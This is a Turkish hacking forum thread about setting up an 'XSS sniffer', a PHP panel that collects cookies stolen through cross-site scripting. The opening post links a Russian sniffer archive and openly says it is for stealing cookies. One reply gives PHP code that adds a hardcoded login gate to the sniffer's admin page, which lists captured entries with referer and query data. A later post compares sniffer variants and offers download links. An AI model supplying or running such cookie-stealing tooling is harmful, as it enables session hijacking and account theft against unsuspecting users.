Forum
Aktif konular
Üyeler
Kurallar
Arama
Xss Sniffer Şifre Koyma Xss Sniffer Şifre Koyma
-
http://kanick.ru/sniffer/deluxe.rar
Şu linkdeki sniffer'a nasıl şifre koyabilirim.. Config dosyasında şifre koyma yeri var false'yi true yapıyorum olmuyor..
Php bilgim olmadığından bu konuda yardımcı olabilecek var mı?
-
Uplayım :) cookie calıyorumda xss linkini bulursa bi kişi şifresiz diğer cookieleri görecek.. Yok mu bi el atan yaww :) gelen cookieleri onada veririm...
-
Ftpye gir - index.php ac sonra asadaki kodu kopyala ve index.php icine yapistir sonra istedigin olur kardesim :)
<? $ourLogin = "zabb";$ourPassword = "keyney";session_start();if ($_SESSION['login']!=$ourLogin && $_SESSION['password']!=$ourPassword) {if ($_POST['login']==$ourLogin && $_POST['password']==$ourPassword) {$_SESSION['login'] = $_POST['login'];$_SESSION['password'] = $_POST['password'];header("Location: index.php");}else {echo "<form action=index.php method=post><center><h1>Xss Sniffer Login Paneli<h1></br>Kullanýcý Adýnýz:<br><input type=text name=login value=''><br>Þifreniz:<br><input type=password name=password value=''><br><input type=submit value='Login'></form> </center>";exit;}} define("FILE", "index.php"); require "config.php"; require "functions.php"; if ($auth_enabled) { $authorized = false; if (isset($_SERVER['PHP_AUTH_USER']) and isset($_SERVER['PHP_AUTH_PW'])) { if ($_SERVER['PHP_AUTH_USER'] == $user and $_SERVER['PHP_AUTH_PW'] == $password) $authorized = true; } if (!$authorized) { header("WWW-Authenticate: Basic realm=\"php Based Sniffer 4 Personal\""); header("HTTP/1.1 401 Unauthorized"); die("Â äîñòóïå îòêàçàíî."); } } if ($_GET['order'] and preg_match("/^(a|de)sc$/i", $_GET['order'])) $order = $_GET['order']; else if ($_COOKIE['s_order'] and preg_match("/^(a|de)sc$/i", $_COOKIE['s_order'])) $order = $_COOKIE['s_order']; else $order = "asc"; setcookie("s_order", $order, time()+7776000); if ($_POST['delete']) { del_selected($_POST['select'], $_POST['count']); header("Location: index.php"); } $data = array(); $data_content = get_file_content($data_filename); if ($data_content !== NULL) $data = unserialize($data_content); $entries_num = count($data); if ($order == "desc") $data = reverse_data($data); $hosts = array(); foreach ($data as $key => $entrie) { $sniffed = unserialize($entrie); preg_match("/^https?:\/\/([^\/]+)/i",$sniffed['referer'], $matches); $sniffed['host'] = $matches[1]; if (!empty($sniffed['host']) and !in_array($sniffed['host'], $hosts)) $hosts[] = $sniffed['host']; if (empty($sniffed['referer'])) $emptyreferer = true; if (empty($sniffed['query'])) $emptyquery = true; } ?> -
neyin xss i bu ?
-
SysTeMeRRoR bunu yazdı:
-----------------------------neyin xss i bu ?
-----------------------------xss açıklarında log tutmak için script hocam. belli biryerin açığı değil
-
Free site almistim orda sifre koyulmuyordu guvenlikden dolayi sanirim. Ucretli siteye koyunca kodlari, otomatik sifre paneli ekrana gelmisti.
Upload sitelerinin xss leri vardi.
-
Bende Bu sitenin tüm snifferlarının olduğu download linklerini ve özelliklerini paylaşayım.
Public Deleteing Records + + + - The system of filters + + + + Page-navigation + + + + Basic-authorization + + + - Request Filtering - + - - The "magic wand" 
- + - - Pomechanie new records + + - - Sending alerts to e-mail, ICQ - + - - Exporting Data + + - - Number of included styles 4 4 1 1 Fine-tuning + + - - Quick replacement of GIF-images + - - - A detailed FAQ + + - - Link Indir Indir Indir Indir
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla